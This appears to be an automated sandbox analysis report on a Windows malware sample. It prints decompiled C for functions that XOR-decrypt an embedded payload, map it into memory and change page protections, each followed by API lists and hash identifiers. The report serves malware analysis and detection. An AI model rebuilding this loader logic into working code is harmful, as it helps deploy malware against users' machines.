                                                                                                                                                                        			}








                                                                                                                                                                        APIs
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00401747
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040174E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorSectionStatusView
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1313840181-0
                                                                                                                                                                        • Opcode ID: 974a8da6c5e5cc3c283821e991db667493e230da3138465f8dbd521083291205
                                                                                                                                                                        • Instruction ID: 177d7cb7bfda170df309ecd4434f9b42d039ef21d8e8738f197cbd30496234ce
                                                                                                                                                                        • Opcode Fuzzy Hash: 974a8da6c5e5cc3c283821e991db667493e230da3138465f8dbd521083291205
                                                                                                                                                                        • Instruction Fuzzy Hash: 17E0C0B6900208BFDB059F94DD0AEEF7B7DEB44300F00856AB615A5150E6B0AA189B60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                        			E00401980(void* __ecx, void* __edx) {
                                                                                                                                                                        				short _v60;
                                                                                                                                                                        				short _v68;
                                                                                                                                                                        				unsigned int _v76;
                                                                                                                                                                        				void _v92;
                                                                                                                                                                        				long _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				void* _v104;
                                                                                                                                                                        				char _v108;
                                                                                                                                                                        				signed int _v112;
                                                                                                                                                                        				long _v116;
                                                                                                                                                                        				unsigned int _v120;
                                                                                                                                                                        				signed int _v124;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				long _t32;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                        				unsigned int _t42;
                                                                                                                                                                        				unsigned int _t43;
                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                        				char _t46;
                                                                                                                                                                        				void* _t55;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                        				void* _t67;
                                                                                                                                                                        				signed int _t68;
                                                                                                                                                                        				signed int _t70;
                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                        				signed char* _t72;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				signed char* _t75;
                                                                                                                                                                        				signed int* _t80;
                                                                                                                                                                        				void* _t81;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                        				WCHAR* _t104;
                                                                                                                                                                        
                                                                                                                                                                        				_t74 = __edx;
                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                        				_t84 = 0;
                                                                                                                                                                        				_v116 = 0;
                                                                                                                                                                        				_t32 = E00401342();
                                                                                                                                                                        				if(_t32 != 0) {
                                                                                                                                                                        					L22:
                                                                                                                                                                        					return _t32;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t32 = E00401804(); // executed
                                                                                                                                                                        				if(_t32 != 0) {
                                                                                                                                                                        					goto L22;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t33 = E004012E6(_t67); // executed
                                                                                                                                                                        					if(_t33 != 0) {
                                                                                                                                                                        						 *0x405478 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t32 = E00401873();
                                                                                                                                                                        					_t97 = _t32 - _t84;
                                                                                                                                                                        					if(_t32 != _t84) {
                                                                                                                                                                        						L20:
                                                                                                                                                                        						if(_t32 == 0xffffffff) {
                                                                                                                                                                        							_t32 = GetLastError();
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L22;
                                                                                                                                                                        					}
                                                                                                                                                                        					E00401C6C(_t67, _t74, _t97); // executed
                                                                                                                                                                        					_t68 = 6;
                                                                                                                                                                        					memset( &_v92, 0, _t68 << 2);
                                                                                                                                                                        					_t37 =  *0x405490; // 0x736c6e70
                                                                                                                                                                        					if(E004021B3(0,  &_v92,  &_v76, _t37 ^ 0xed79247c) == 0) {
                                                                                                                                                                        						_t32 = 0xb;
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t42 = _v76;
                                                                                                                                                                        					_t80 = _v92;
                                                                                                                                                                        					_t66 =  *0x40548c; // 0x0
                                                                                                                                                                        					_t70 = _t42;
                                                                                                                                                                        					_t43 = _t42 >> 2;
                                                                                                                                                                        					_v112 = _t70;
                                                                                                                                                                        					_v124 = _t84;
                                                                                                                                                                        					_t75 = _t80;
                                                                                                                                                                        					_v120 = _t43;
                                                                                                                                                                        					if(_t43 == 0) {
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t71 = _t70 & 0x00000003;
                                                                                                                                                                        						if(_t71 == 0) {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							_t104 =  *0x405484; // 0x2888808
                                                                                                                                                                        							if(_t104 != 0) {
                                                                                                                                                                        								wsprintfW( &_v68, 0x4040f0, GetCurrentProcessId());
                                                                                                                                                                        								_t55 = CreateFileMappingW(0xffffffff, 0, 4, 0, lstrlenW( *0x405484) + _t53 + 2,  &_v60); // executed
                                                                                                                                                                        								if(_t55 != 0) {
                                                                                                                                                                        									_t56 = MapViewOfFile(_t55, 6, 0, 0, 0); // executed
                                                                                                                                                                        									_t81 = _t56;
                                                                                                                                                                        									if(_t81 != 0) {
                                                                                                                                                                        										lstrcpyW(_t81,  *0x405484);
                                                                                                                                                                        										UnmapViewOfFile(_t81);
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							if(( *0x405478 & 0x00000001) != 0) {
                                                                                                                                                                        								_v116 = 0x10;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t44 =  *0x405470; // 0x1ae8
                                                                                                                                                                        							_v100 = _t44;
                                                                                                                                                                        							_v96 = GetCurrentThreadId();
                                                                                                                                                                        							_t46 =  *0x40546c; // 0x1a0
                                                                                                                                                                        							_v108 = _t46;
                                                                                                                                                                        							_v104 = GetCurrentThread();
                                                                                                                                                                        							_t32 = E004022D1(_t75,  &_v92,  &_v108, _v116); // executed
                                                                                                                                                                        							goto L20;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t88 = _t71;
                                                                                                                                                                        						_t72 = _t75;
                                                                                                                                                                        						_t82 = _t80 - _t75;
                                                                                                                                                                        						do {
                                                                                                                                                                        							 *_t72 =  *(_t82 + _t72) ^ _t66;
                                                                                                                                                                        							_t72 =  &(_t72[1]);
                                                                                                                                                                        							_t88 = _t88 - 1;
                                                                                                                                                                        						} while (_t88 != 0);
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        					do {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						_v124 = _v124 + 1;
                                                                                                                                                                        						_t61 =  *_t80;
                                                                                                                                                                        						asm("rol eax, cl");
                                                                                                                                                                        						_t80 =  &(_t80[1]);
                                                                                                                                                                        						_t84 = _t61 ^ _t84 ^ _t66;
                                                                                                                                                                        						 *_t75 = _t84;
                                                                                                                                                                        						_t75 =  &(_t75[4]);
                                                                                                                                                                        						_t14 =  &_v120;
                                                                                                                                                                        						 *_t14 = _v120 - 1;
                                                                                                                                                                        					} while ( *_t14 != 0);
                                                                                                                                                                        					_t70 = _v112;
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				}
                                                                                                                                                                        			}









































                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00401342: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401997,?,00000000), ref: 00401351
                                                                                                                                                                          • Part of subcall function 00401342: GetVersion.KERNEL32(?,00000000), ref: 00401360
                                                                                                                                                                          • Part of subcall function 00401342: GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401377
                                                                                                                                                                          • Part of subcall function 00401342: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401390
                                                                                                                                                                          • Part of subcall function 004012E6: GetModuleHandleA.KERNELBASE(00406016,00000000,?,?,004019B1,?,00000000), ref: 00401303
                                                                                                                                                                          • Part of subcall function 004012E6: GetProcAddress.KERNELBASE(00000000,00406209), ref: 00401314
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 00401A65
                                                                                                                                                                        • wsprintfW.USER32 ref: 00401A76
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00401A8A
                                                                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401A9B
                                                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401AAB
                                                                                                                                                                        • lstrcpyW.KERNEL32 ref: 00401ABE
                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00401AE5
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00401AF8
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00401B1E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Current$FileProcess$CreateThreadView$AddressErrorEventHandleLastMappingModuleOpenProcUnmapVersionlstrcpylstrlenwsprintf
                                                                                                                                                                        • String ID: pnls
                                                                                                                                                                        • API String ID: 1887955078-141991303
                                                                                                                                                                        • Opcode ID: 2a75da98b7358f4dbcc57d5f3d012a061073d7ae8a3f33a0b7cbb0297221129f
                                                                                                                                                                        • Instruction ID: 4caec36e83c9f8a5fb1ddda594c80eefce4d5a052f5e2ea32368159318993c28
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a75da98b7358f4dbcc57d5f3d012a061073d7ae8a3f33a0b7cbb0297221129f
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E41C3716052009BC711AF64DE48A9BBBF8EB88755F14093AF685F32B1D734D844CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                        			E00402C3F(void* __ebx, void* __edx, void* __eflags, struct _CRITICAL_SECTION* _a4, unsigned int _a8, intOrPtr _a12) {
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				int _t24;
                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                                                        				unsigned int _t34;
                                                                                                                                                                        				long _t35;
                                                                                                                                                                        				intOrPtr* _t36;
                                                                                                                                                                        
                                                                                                                                                                        				_push(0x18);
                                                                                                                                                                        				_t34 = _a8 >> 0xc;
                                                                                                                                                                        				_t36 = E004017EF(_t16, __ebx, __eflags);
                                                                                                                                                                        				if(_t36 == 0) {
                                                                                                                                                                        					_t35 = 8;
                                                                                                                                                                        					L11:
                                                                                                                                                                        					return _t35;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                        				 *(_t36 + 8) = _t34;
                                                                                                                                                                        				 *((intOrPtr*)(_t36 + 0x10)) = _a12;
                                                                                                                                                                        				 *((intOrPtr*)(_t36 + 0x14)) = 0;
                                                                                                                                                                        				EnterCriticalSection(_a4);
                                                                                                                                                                        				_t29 = E00402192(_a4, _t34);
                                                                                                                                                                        				if(_t29 == _a4 + 0x18 ||  *((intOrPtr*)(_t29 + 8)) != _t34) {
                                                                                                                                                                        					_t10 = _t36 + 0xc; // 0xc
                                                                                                                                                                        					_t24 = VirtualProtect(_a8, 1, 1, _t10); // executed
                                                                                                                                                                        					__eflags = _t24;
                                                                                                                                                                        					if(_t24 == 0) {
                                                                                                                                                                        						_t35 = GetLastError();
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 4)) = _t36;
                                                                                                                                                                        						 *_t36 = _t36;
                                                                                                                                                                        						_t27 =  *_t29;
                                                                                                                                                                        						 *_t36 = _t27;
                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 4)) = _t29;
                                                                                                                                                                        						 *((intOrPtr*)(_t27 + 4)) = _t36;
                                                                                                                                                                        						 *_t29 = _t36;
                                                                                                                                                                        						_t35 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t35 = 0xb7;
                                                                                                                                                                        				}
                                                                                                                                                                        				LeaveCriticalSection(_a4);
                                                                                                                                                                        				if(_t35 != 0) {
                                                                                                                                                                        					E00401759(_t36);
                                                                                                                                                                        					if(_t35 == 0xb7) {
                                                                                                                                                                        						_t35 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L11;
                                                                                                                                                                        			}












                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004017EF: HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,00000018,?,Nov 27 2018,?,00401B78,?,?,00000000,?,Nov 27 2018,00400000,C70A74C0,?,00401852), ref: 00402C6F
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000001,00000001,0000000C,?,?,00401B78,?,?,00000000,?,Nov 27 2018,00400000,C70A74C0,?,00401852), ref: 00402CA1
                                                                                                                                                                        • GetLastError.KERNEL32(?,00401B78,?,?,00000000,?,Nov 27 2018,00400000,C70A74C0,?,00401852,C70A74C0,?,00000000,?,00000000), ref: 00402CC0
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,00401B78,?,?,00000000,?,Nov 27 2018,00400000,C70A74C0,?,00401852,C70A74C0,?,00000000,?), ref: 00402CCB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$AllocEnterErrorHeapLastLeaveProtectVirtual
                                                                                                                                                                        • String ID: Nov 27 2018
                                                                                                                                                                        • API String ID: 1328245997-3268329997
                                                                                                                                                                        • Opcode ID: 59041497bef81b6d9aff65f8b18ffacbfce1d9f0f3900f9e81025ae718ea1d73
                                                                                                                                                                        • Instruction ID: 7fd9c40926545a752c4d662743fe78391a9f6cb161dd72072a4b975be33c32d9
                                                                                                                                                                        • Opcode Fuzzy Hash: 59041497bef81b6d9aff65f8b18ffacbfce1d9f0f3900f9e81025ae718ea1d73
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E21C072204714DBEB209F19CA48B5E7BE9BF84710F10843BF649AB3D0C7B49841CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			_entry_() {
                                                                                                                                                                        				void* _t1;
                                                                                                                                                                        				int _t4;
                                                                                                                                                                        				void* _t6;
                                                                                                                                                                        				void* _t7;
                                                                                                                                                                        				int _t8;
                                                                                                                                                                        
                                                                                                                                                                        				_t8 = 0;
                                                                                                                                                                        				_t1 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                        				 *0x405438 = _t1;
                                                                                                                                                                        				if(_t1 != 0) {
                                                                                                                                                                        					 *0x40547c = GetModuleHandleA(0);
                                                                                                                                                                        					GetCommandLineW(); // executed
                                                                                                                                                                        					_t4 = E00401980(_t6, _t7); // executed
                                                                                                                                                                        					_t8 = _t4; // executed
                                                                                                                                                                        					HeapDestroy( *0x405438); // executed
                                                                                                                                                                        				}
                                                                                                                                                                        				ExitProcess(_t8);
                                                                                                                                                                        			}









                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401BA2
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401BB2
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00401BBD
                                                                                                                                                                          • Part of subcall function 00401980: GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 00401A65
                                                                                                                                                                          • Part of subcall function 00401980: wsprintfW.USER32 ref: 00401A76
                                                                                                                                                                          • Part of subcall function 00401980: lstrlenW.KERNEL32(?), ref: 00401A8A
                                                                                                                                                                          • Part of subcall function 00401980: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401A9B
                                                                                                                                                                        • HeapDestroy.KERNELBASE ref: 00401BD0
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401BD7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeapProcess$CommandCurrentDestroyExitFileHandleLineMappingModulelstrlenwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1996550440-0
                                                                                                                                                                        • Opcode ID: db4ff8f327a96312085b73e2dd1bc9e0a90428c9eb53a64be6c69bf1021327be
                                                                                                                                                                        • Instruction ID: 108fe706f2659071e8fd9801d4f60fcc127283e106fcb6075fde737f109390ca
                                                                                                                                                                        • Opcode Fuzzy Hash: db4ff8f327a96312085b73e2dd1bc9e0a90428c9eb53a64be6c69bf1021327be
                                                                                                                                                                        • Instruction Fuzzy Hash: 0BE092B18026209BC7212B71AE4CB8A7A64FB45356B140435F701B2170DB3848808EAC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E00401DA3(void* __ecx, struct _CRITICAL_SECTION* _a4, long _a8, signed int _a12) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                        				signed int _t32;
                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                        				int _t36;
                                                                                                                                                                        				long _t37;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				void* _t42;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t39 = _a8;
                                                                                                                                                                        				_v8 = 0x490;
                                                                                                                                                                        				_t50 = _t39 >> 0xc;
                                                                                                                                                                        				EnterCriticalSection(_a4);
                                                                                                                                                                        				_t56 = E00402192(_a4, _t50);
                                                                                                                                                                        				if(_t56 != _a4 + 0x18 &&  *((intOrPtr*)(_t56 + 8)) == _t50) {
                                                                                                                                                                        					_t30 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                        					if(_a12 == 0) {
                                                                                                                                                                        						_t52 = _t50 | 0xffffffff;
                                                                                                                                                                        						_t30 = _t30 - 1;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t52 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = _v8 & 0x00000000;
                                                                                                                                                                        					if(_t30 != 0) {
                                                                                                                                                                        						L8:
                                                                                                                                                                        						 *((intOrPtr*)(_t56 + 0x14)) =  *((intOrPtr*)(_t56 + 0x14)) + _t52;
                                                                                                                                                                        						_t31 =  *(_t56 + 0x10);
                                                                                                                                                                        						_a12 = _t31;
                                                                                                                                                                        						if(_t31 != 0) {
                                                                                                                                                                        							_t47 = _t39 & 0xfffff000;
                                                                                                                                                                        							_t53 = 0;
                                                                                                                                                                        							_t42 = 0;
                                                                                                                                                                        							_a8 = 0x400;
                                                                                                                                                                        							do {
                                                                                                                                                                        								_t32 =  *_t47;
                                                                                                                                                                        								_t45 = _t32;
                                                                                                                                                                        								if(_t32 == 0) {
                                                                                                                                                                        									_a8 = 1;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t34 = _t32 ^ _t53 ^ _a12;
                                                                                                                                                                        									_t42 = _t42 + 1;
                                                                                                                                                                        									_t53 = _t45;
                                                                                                                                                                        									asm("ror eax, cl");
                                                                                                                                                                        									 *_t47 = _t34;
                                                                                                                                                                        									_t47 = _t47 + 4;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t20 =  &_a8;
                                                                                                                                                                        								 *_t20 = _a8 - 1;
                                                                                                                                                                        							} while ( *_t20 != 0);
                                                                                                                                                                        							 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t11 = _t56 + 0xc; // 0xc
                                                                                                                                                                        						_t36 = VirtualProtect(_t39, 1,  *_t11, _t11); // executed
                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                        							goto L8;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t37 = GetLastError();
                                                                                                                                                                        							_v8 = _t37;
                                                                                                                                                                        							if(_t37 == 0) {
                                                                                                                                                                        								goto L8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				LeaveCriticalSection(_a4);
                                                                                                                                                                        				return _v8;
                                                                                                                                                                        			}


















                                                                                                                                                                        0x00401e52
                                                                                                                                                                        0x00401e54
                                                                                                                                                                        0x00401e54
                                                                                                                                                                        0x00401e60
                                                                                                                                                                        0x00401e60
                                                                                                                                                                        0x00401e60
                                                                                                                                                                        0x00401e65
                                                                                                                                                                        0x00401e65
                                                                                                                                                                        0x00401dfe
                                                                                                                                                                        0x00401dfe
                                                                                                                                                                        0x00401e07
                                                                                                                                                                        0x00401e0f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401e11
                                                                                                                                                                        0x00401e11
                                                                                                                                                                        0x00401e19
                                                                                                                                                                        0x00401e1c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401e1c
                                                                                                                                                                        0x00401e0f
                                                                                                                                                                        0x00401dfc
                                                                                                                                                                        0x00401e6c
                                                                                                                                                                        0x00401e79

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401DBC
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000001,0000000C,0000000C,?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E07
                                                                                                                                                                        • GetLastError.KERNEL32(?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E11
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E6C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3666628472-0
                                                                                                                                                                        • Opcode ID: 9d610dfabf0101aea75969bf899ceb8f515411d493bf5a66a41a06d1e302b9ee
                                                                                                                                                                        • Instruction ID: 99f1bd1666aba7f9c62c34db6cf46ebf7b6a25346f6e8afa7671cca4496c2698
                                                                                                                                                                        • Opcode Fuzzy Hash: 9d610dfabf0101aea75969bf899ceb8f515411d493bf5a66a41a06d1e302b9ee
                                                                                                                                                                        • Instruction Fuzzy Hash: 80214F72600304AFDB20CF65CC44B9B77E5FB84364F10853AE919E72A0D778E945CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E00401667(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, void* _a4) {
                                                                                                                                                                        				CHAR* _v8;
                                                                                                                                                                        				struct _OVERLAPPED* _v12;
                                                                                                                                                                        				long _v16;
                                                                                                                                                                        				void _v20;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				long _t23;
                                                                                                                                                                        				int _t27;
                                                                                                                                                                        				long _t31;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_t16 = E00401BDE(__ebx, __ecx, __edx, __eflags, __edi,  &_v8, 0);
                                                                                                                                                                        				if(_t16 != 0) {
                                                                                                                                                                        					L11:
                                                                                                                                                                        					return _v12;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                        				_push(__edi); // executed
                                                                                                                                                                        				"j,hHA@"(); // executed
                                                                                                                                                                        				if(_t16 == 0) {
                                                                                                                                                                        					L10:
                                                                                                                                                                        					E00401759(_v8);
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                        				_t31 = E00401CD7(__edi, __ecx, _t16 - __edi);
                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                        					_t22 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                        					_a4 = _t22;
                                                                                                                                                                        					if(_t22 != 0xffffffff) {
                                                                                                                                                                        						_t23 = SetFilePointer(_t22, _t31, 0, 0); // executed
                                                                                                                                                                        						if(_t23 == _t31) {
                                                                                                                                                                        							_t27 = ReadFile(_a4,  &_v20, 4,  &_v16, 0); // executed
                                                                                                                                                                        							if(_t27 != 0 && _v16 == 4) {
                                                                                                                                                                        								_v12 = _v20 + __edi;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						FindCloseChangeNotification(_a4); // executed
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L10;
                                                                                                                                                                        			}













                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00401BDE: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,?,00000000,?,?,00401C85,?,00000001,?,00000000), ref: 00401C04
                                                                                                                                                                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?), ref: 004016B8
                                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,00402132,?), ref: 004016CA
                                                                                                                                                                        • ReadFile.KERNELBASE(?,?,00000004,?,00000000,?,?,?,?,?,00402132,?), ref: 004016E2
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00402132,?), ref: 004016FD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
